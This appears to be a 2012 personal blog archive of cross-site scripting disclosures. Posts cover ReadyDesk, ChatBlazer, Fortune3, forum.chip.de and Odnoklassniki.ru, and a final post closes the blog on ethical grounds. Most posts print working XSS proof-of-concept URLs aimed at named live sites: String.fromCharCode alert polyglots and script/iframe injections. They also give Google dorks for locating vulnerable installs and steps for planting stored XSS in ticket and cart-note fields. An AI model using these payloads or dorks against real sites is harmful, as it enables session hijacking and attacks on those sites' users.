vineri, 20 aprilie 2012

Closed.

Reason?

I will not post any bugs in the future, because I changed my views on this and now consider it to be unethical.

joi, 19 aprilie 2012

ReadyDesk Cross Site Scripting

# Exploit Title: ReadyDesk Cross Site Scripting
# Date: 19.04.2012
# Author: Sony
# Software Link: http://www.readydesk.com/
# Google Dorks: powered by readydesk
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
 http://st2tea.blogspot.com/2012/04/readydesk-cross-site-scripting.html
..................................................................


Well, we have persistent xss in the "View Existing Tickets".

We can use Demo:

http://www.readydesk.com/demo.asp


http://www.readydesk.com/rd7/customer/rdlogin.aspx (Customer Interface)


But first --> Submit New Ticket (with our xss code). (i think all fields in the send form)

 









ChatBlazer Flash Chat Cross Site Scripting

# Exploit Title:  ChatBlazer Flash Chat Cross Site Scripting
# Date: 19.04.2012
# Author: Sony
# Software Link: www.chatblazer.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:

http://st2tea.blogspot.com/2012/04/chatblazer-flash-chat-cross-site.html
.................................................................

Well, we have cross site scripting in ChatBlazer.

We can use Demo. (simple example)


http://demo.chatblazer.net/cb8.5/client.php?username=%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29%3C/SCRIPT%3E&password=&roomid=1009&config=config.php%3Fembed%3D0


miercuri, 18 aprilie 2012

Fortune3 Cross Site Scripting

# Exploit Title: Fortune3 Cross Site Scripting
# Date: 18.04.2012
# Author: Sony
# Software Link: http://www.fortune3.com/
# Google Dorks: Powered by FORTUNE3
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:

http://st2tea.blogspot.com/2012/04/fortune3-cross-site-scripting.html
..................................................................

Well, we have some xss in Fortune3.

Our test with http://www.naturalab.com (simple example)


Add to cart - product what you want and open page Print Cart or Email Cart.

Print Cart and Email Cart:

Put our xss code in "Include a Note" and press button Continue.



















marți, 17 aprilie 2012

Hijacking attempt [mini funny xss stuff]







luni, 16 aprilie 2012

forum.chip.de xss

http://codepad.org/2r8vW8DM

or

http://forum.chip.de/newthread.php?do=newthread&f=155%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E


O_o

or

http://forum.chip.de/grafikkarten/?daysprune=-1%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&order=desc&sort=views

%)


duminică, 15 aprilie 2012

Odnoklassniki.ru Cross Site Scripting

# Date: 15.04.2012
# Author: Sony and Flexxpoint
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
# Flexxpoint Blog: http://flexxpoint.blogspot.com/
# PoC:
http://st2tea.blogspot.com/2012/04/odnoklassnikiru-cross-site-scripting.html
..................................................................
 
Well, we have a cross site scripting on Odnoklassniki.ru
 
http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E
 
or
 
http://codepad.org/kKjrrn76